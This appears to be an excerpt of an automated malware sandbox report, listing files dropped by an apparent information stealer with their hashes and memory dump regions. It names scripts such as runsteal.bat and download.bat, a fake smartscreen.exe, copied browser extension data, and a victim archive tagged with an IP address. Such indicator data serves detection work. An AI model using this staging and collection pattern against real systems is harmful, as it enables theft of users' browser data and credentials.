C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin

MD5 50d9cbfc86063598d36e2f17308107f9
SHA1 b60775ecc55ea344f7cbfc474c9b29370fc576f3
SHA256 4db84cc62edeabe399e8697ef4522889556a101b4f7998fd8f0ac0b4afbaba6c
SHA512 0441e40eafd84fec57115852071198db7950b35013e990cb053a485569215777e976c81eb3e3c9561645dab581aef38e9da317ac0e27f5bb41b01b59101d7012

memory/3956-3506-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-3507-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3510-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/6032-3511-0x0000000001160000-0x0000000001564000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/6032-3514-0x0000000001B00000-0x0000000001B0E000-memory.dmp

memory/6032-3515-0x0000000005CC0000-0x0000000005D1C000-memory.dmp

memory/6032-3516-0x0000000006390000-0x0000000006934000-memory.dmp

memory/6032-3517-0x0000000005DE0000-0x0000000005E72000-memory.dmp

memory/6032-3518-0x0000000006290000-0x00000000062A2000-memory.dmp

memory/6032-3519-0x00000000062A0000-0x00000000062A8000-memory.dmp

memory/6032-3521-0x00000000062D0000-0x00000000062D8000-memory.dmp

memory/6032-3520-0x00000000062C0000-0x00000000062C8000-memory.dmp

memory/6032-3522-0x00000000062E0000-0x00000000062F8000-memory.dmp

memory/6032-3523-0x0000000006370000-0x0000000006380000-memory.dmp

memory/6032-3524-0x0000000007070000-0x0000000007698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_goaqrfbu.ee5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6032-3534-0x00000000079C0000-0x00000000079DA000-memory.dmp

memory/6032-3535-0x0000000007A20000-0x0000000007A56000-memory.dmp

memory/6032-3536-0x00000000080E0000-0x000000000875A000-memory.dmp

memory/6032-3537-0x0000000007B00000-0x0000000007B96000-memory.dmp

memory/6032-3538-0x0000000007A90000-0x0000000007AB2000-memory.dmp

memory/6032-3539-0x0000000007C10000-0x0000000007C76000-memory.dmp

memory/6032-3541-0x0000000007C80000-0x0000000007CCA000-memory.dmp

memory/6032-3540-0x0000000007AE0000-0x0000000007AFE000-memory.dmp

memory/6032-3542-0x0000000008760000-0x0000000008AB4000-memory.dmp

memory/6032-3543-0x0000000007F90000-0x0000000007FF6000-memory.dmp

memory/6032-3544-0x0000000008030000-0x0000000008052000-memory.dmp

memory/6032-3545-0x0000000008EA0000-0x0000000008EEC000-memory.dmp

memory/4924-3546-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/6032-3556-0x000000000A0A0000-0x000000000A0BE000-memory.dmp

memory/6032-3557-0x000000000A2C0000-0x000000000A363000-memory.dmp

memory/6032-3558-0x000000000A470000-0x000000000A47A000-memory.dmp

memory/6032-3559-0x000000000A4A0000-0x000000000A4B1000-memory.dmp

memory/6032-3560-0x000000000A480000-0x000000000A48E000-memory.dmp

memory/6032-3561-0x000000000A4E0000-0x000000000A4F4000-memory.dmp

memory/6032-3562-0x000000000A520000-0x000000000A53A000-memory.dmp

memory/6032-3563-0x000000000A510000-0x000000000A518000-memory.dmp

memory/6032-3564-0x00000000092C0000-0x00000000092CA000-memory.dmp

memory/6032-3565-0x000000000A4E0000-0x000000000AAF8000-memory.dmp

memory/6032-3566-0x0000000009320000-0x0000000009332000-memory.dmp

memory/6032-3567-0x0000000009380000-0x00000000093BC000-memory.dmp

memory/6032-3568-0x00000000094F0000-0x00000000095FA000-memory.dmp

memory/6032-3570-0x00000000097D0000-0x0000000009992000-memory.dmp

memory/3956-3569-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/5248-3601-0x000001F420D10000-0x000001F420D3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

memory/3828-3623-0x000000006EC70000-0x000000006ECBC000-memory.dmp

memory/3828-3633-0x0000000007680000-0x0000000007723000-memory.dmp

memory/3828-3622-0x0000000007640000-0x0000000007672000-memory.dmp

memory/3828-3634-0x0000000007990000-0x00000000079A1000-memory.dmp

memory/5500-3636-0x000000006EC70000-0x000000006ECBC000-memory.dmp

memory/3828-3635-0x00000000079E0000-0x00000000079F4000-memory.dmp

memory/4924-3646-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8970ae5715dbb32ef2975612a3e00425
SHA1 d459738421b299d9d04884d4ff23e384d9a9213f
SHA256 a466aed52f0b6da075800fe2af7ca368caba3533dc01e45b6cb39101aeb53a0b
SHA512 f909623d43cf078bd7fa14ed94e68007a17b15fa62fa3c00e25f6caa504ef153f154870f991de70c978f74898214349db39a90cc99e154ec47d31b73d37b7ebe

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

memory/5500-3669-0x0000000007970000-0x0000000007981000-memory.dmp

memory/5500-3680-0x00000000079B0000-0x00000000079C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ddae79f83b34ee537c9802193e5dba7f
SHA1 1e250eb79caf50db3289688eece14a6be214fe6a
SHA256 08131b07b49c79232b75b64bfa16a24874f2bd1fdbaf04eb2fc2ff03ae479f9b
SHA512 ecdc7cec5f200f87730ab90d844d2572dfdc767a816be57f4344f3db27f08dc256317cab2587198fdec66fe88499f903f0bc02e343aca523f07cbe4027f6ba22

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43a6c4edabf3ba9857b920b4711e6204
SHA1 dba2500a082d49c473a10d5c1660f46c731b442f
SHA256 dfb1405e89c84c3d5701bde57e00746319eb6a334e4c18a9416fdf30f32f67da
SHA512 89452aa312e76930885500c0eb06d0e3dfe887505f8723a47607f89a6812ec566d879d57fbc41ea5261a6e4589dad254911506fd3f89c87429661ae8994cf0f8

memory/3956-3711-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6ca4a24f2ab489c2a287eae9803de223
SHA1 677acbd93e5210ed9a796c97ecb8b6d22e9568ee
SHA256 2cad5713b7c21d222da95fd80654c4a04da426bdd57c1b437651750e975ba51a
SHA512 7cf4812346eb93904f24776a7f2ba9521be1cdee34aea884815e8604304b4e2550808fc6e577fca0fe3256ea5705e6b8ed26f2abecc1028b77756dbad89cd509

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/5928-3724-0x000001F82F4F0000-0x000001F82F51E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82742c2ba7a4918d25d7f05b46b2a8b7
SHA1 d61db73b9b9daf2d0fbc7563b41c60f2232a368b
SHA256 ec97ddcbfea8445124be7de1976945b852531520f62c465274dfa6749521310b
SHA512 c043c7eb380c364f9731cdcfbea5e25c92332fc307e399e8b83a353d039bb88f718cf78815280bc642ddd70152a5748d4c5db0f5b55d027a57726938884b9ada

memory/4896-3739-0x0000000007170000-0x0000000007182000-memory.dmp

memory/4896-3740-0x0000000007230000-0x000000000723A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 f67672c18281ad476bb09676baee42c4
SHA1 fb4e31c9a39545d822b2f18b0b87ca465e7768c9
SHA256 d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61
SHA512 ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

memory/4924-3753-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

C:\Users\Admin\AppData\Local\asm\mi.exe

memory/3956-3758-0x0000000000400000-0x0000000000C62000-memory.dmp